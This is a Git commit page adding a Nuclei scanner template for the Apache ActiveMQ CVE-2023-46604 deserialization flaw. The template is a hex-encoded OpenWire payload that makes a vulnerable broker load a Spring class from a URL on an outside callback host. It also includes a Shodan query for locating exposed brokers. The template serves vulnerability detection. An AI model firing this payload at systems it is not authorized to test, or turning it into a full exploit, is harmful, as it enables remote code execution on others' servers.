daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #8529 from projectdiscovery/CVE-2023-46604 

Added Apache ActiveMQ CVE-2023-46604 RCE
patch-1
pussycat0x 2023-11-07 22:55:44 +05:30 committed by GitHub
parent 0ea5776c2d 0d1d5020ee
commit 79286da876
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 51 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

51
network/cves/2023/CVE-2023-46604.yaml Normal file
View File

@ -0,0 +1,51 @@
id: CVE-2023-46604
info:
name: Apache ActiveMQ - Remote Code Execution
author: Ice3man,Mzack9999,pdresearch
severity: critical
description: |
Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.
Users are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue.
reference:
- http://www.openwall.com/lists/oss-security/2023/10/27/5
- https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt
- https://github.com/X1r0z/ActiveMQ-RCE
- https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis?referrer=etrblog
- https://paper.seebug.org/3058/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H
cvss-score: 10
cve-id: CVE-2023-46604
cwe-id: CWE-502
epss-score: 0.00053
epss-percentile: 0.19228
metadata:
verified: true
shodan-query: 'product:"ActiveMQ OpenWire Transport"'
tags: cve,cve2023,network,rce,apache,activemq,deserialization
variables:
prefix: "1f00000000000000000001010042"
classname: "6f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401"
final: "{{prefix}}{{classname}}"
tcp:
- inputs:
- data: "{{hex_decode('00000'+dec_to_hex(len(final+'00'+dec_to_hex(len('http://{{interactsh-url}}'))+hex_encode('http://{{interactsh-url}}')))+final+'00'+dec_to_hex(len('http://{{interactsh-url}}'))+hex_encode('http://{{interactsh-url}}'))}}"
host:
- "{{Hostname}}"
port: 61616
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
- "http"
- type: word
words:
- "ActiveMQ"
- "StackTraceEnabled"
condition: and